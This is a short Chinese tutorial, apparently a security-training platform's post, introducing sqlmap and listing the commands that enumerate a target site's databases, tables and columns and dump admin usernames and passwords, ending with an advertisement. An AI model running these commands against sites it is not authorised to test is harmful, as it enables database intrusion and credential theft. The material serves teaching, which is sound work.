首先,先简单介绍下sqlmap
简介:
sqlmap是一种开源的工具,可以自动检测和利用sql注入以及接入该库的服务器。它拥有非常强大的检测引擎、具有多种特性的器、通过库指纹提取访问底层文件系统并通过外带连接执行命令。
支持的数据库:MySQL,Orac++le, PostgreSQL, Microsoft SQL Server, Microsoft access, IBM DB2, SQLite, Firebird, Sybase and sap MAXDB。
sqlmap支持五种不同的注入模式:
UniON query SQL injection(可联合查询注入Error-based SQL injection(报错型注入)Boolean-based blind SQL injection(布尔型注入)Time-based blind SQL injection(基于时间延迟注入)Stacked queries SQL injection(可多语句查询注入)
基本用法:-u 使用sqlmap--dbs 获取数据库名--tables 获取表名--columns 获取字段名
--dump 获取字段内容
实战:
1.获取库名
python2 sqlmap.py -u "http://xxx.com" --dbs
成功获取库名
接下来得根据经验,猜他的账户,密码 在哪个库里,或者都进去看看也可以。
2.继续获取表名
python2 sqlmap.py -u "http://xxx.com" -D 库名 --tables
看见admin 看来离目标 不远了
3.获取字段名
python2 sqlmap.py -u "http://xxx.com" -D 库名 -T admin --columns
看到admin_name admin _pass 果然就在这
4.获取用户名,密码
python2 sqlmap.py -u "http://xxx.com" -D 库名 -T admin -C admin_name,admin_pass --dump
安界网通过开发全球顶尖的网络安全教育精品内容,致力于教育+AI、理论+实战、线上+线下的创新科技教育模式,结合专有师带徒模式贴合应用、实战式教学场景,打造知识课程、社交实战和生态服务为一体的全栈式网络安全教育服务平台;同时研发辅助安全教育平台工具化和产品化的安全服务类型产品;实现为企业提供"一站式"全生命周期的网络安全综合服务提供商。有兴趣的小伙伴可以私信撩我!
